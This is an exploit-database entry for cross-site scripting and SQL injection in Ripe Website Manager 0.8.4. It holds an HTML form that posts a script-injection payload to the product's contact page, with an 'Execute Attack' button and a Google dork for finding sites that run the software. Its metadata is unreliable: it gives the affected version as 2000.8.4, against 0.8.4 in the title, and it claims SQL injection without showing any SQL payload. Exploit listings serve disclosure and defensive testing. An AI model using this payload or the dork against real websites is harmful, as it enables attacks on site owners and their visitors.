Ripe Website Manager ( - exploit.company

vendor:

Ripe Website Manager

by:

John Martinelli

7.5

CVSS

HIGH

Cross-Site Scripting and SQL Injection

CWE

Product Name: Ripe Website Manager

Affected Version From: 2000.8.4

Affected Version To: 2000.8.4

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Ripe Website Manager (<= 0.8.4) - Cross-Site Scripting and SQL Injection Exploit

This exploit allows an attacker to perform cross-site scripting and SQL injection attacks in Ripe Website Manager version 0.8.4 and below. The exploit was discovered by John Martinelli.

Mitigation:

To mitigate this vulnerability, it is recommended to update Ripe Website Manager to a version higher than 0.8.4.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23597/info


<html>
<head><title>Ripe Website Manager (<= 0.8.4) - Cross-Site Scripting and SQL Injection Exploit</title><body>

<center><br><br><font size=4>Ripe Website Manager (<= 0.8.4) - Cross-Site Scripting and SQL Injection Exploit</font><br><font size=3>discovered by <a
href="http://john-martinelli.com">John Martinelli</a><br><br>Google d0rk: <a href="http://www.google.com/search?q=%22Powered+by+Ripe+Website+Manager>"Powered by Ripe
Website Manager"</a></font><br>

<br><br>
<form action="http://www.example.com/path/contact/index.php" method="post">
<input name="ripeformpost" size=75 value="<"<<script>alert(1);</script>">
<input type=submit value="Execute Attack" class="button">
</form>